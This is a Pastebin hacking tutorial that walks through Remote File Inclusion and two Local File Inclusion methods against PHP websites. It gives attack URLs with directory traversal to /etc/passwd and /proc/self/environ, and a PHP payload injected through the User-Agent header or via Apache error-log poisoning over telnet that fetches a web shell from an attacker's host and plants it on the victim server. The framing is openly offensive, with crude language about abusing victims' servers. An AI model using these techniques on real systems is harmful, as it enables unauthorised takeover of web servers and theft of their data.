Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- This tutorial contains:
- -> RFI
- -> LFI method 1
- -> LFI method 2
- First, I will start with the RFI method.
- RFI or Remote File Inclusion is a technique which allows you to include a remote file(from a URL) to a webscript.
- Let's say we have a website called
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=register.php
- Now take a look at the part after "index.php?", do you see that "include=register.php" ? This is exactly what we are looking for.
- Now try to include google by typing in
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=http://www.google.com
- Now, if it displays the google page, you are able to include remote files. If it gives an error message, jump to the LFI part of the tutorial now.
- Well, let's just say it worked and it displays google. Now we are going to include a shell(you can get one here). Do this by typing this into your URL bar:
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=http://www.z0mgh4x0rpage.com/mastershell.txt
- WARNING: Put your shell ALWAYS in TXT format on your website, otherwise people will be able to access it and F*** with your server!!
- Alright thats it! Now your shell is included and you can rape the victims webserver.
- Now we are going for LFI method 1
- NOTE: You will need FireFox and its addon Tamper Data to do this method!
- LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
- In this method we are going to upload a shell by accessing the proc/self/environ.
- Now we have our page
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=register.php
- And now we are going to do this:
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=../
- If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=../etc/passwd
- And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=../etc/passwd
- http://www.v1ct1mp4g31337.com/index.php?include=../../etc/passwd
- http://www.v1ct1mp4g31337.com/index.php?include=../../../etc/passwd
- And so on. Now let's say we got to this URL
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=../../../etc/passwd
- And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
- Code:
- http://www.v1ct1mp4g31337.com/index.php?include=../../../proc/self/environ
- If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:
- PHP Code:
- <?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
- $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
- This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.
- Now simply access your shell by going to
- Code:
- http://www.v1ct1mp4g31337.com/shell.php
- And rape the server.
- Now LFI method 2
- NOTE: This only works on apache servers!
- Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log
- If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).
- Now when you have found the file, open up cmd and type in
- Code:
- telnet www.v1ct1mp4g31337.com 80
- When you are inside the telnet, you copy the following code(you use your own shell url ofc)
- PHP Code:
- <?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/mastershell.txt", "r"); while(!feof($stream)) {
- $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
- Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).
- Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:
- Code:
- http://www.v1ct1mp4g31337.com/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement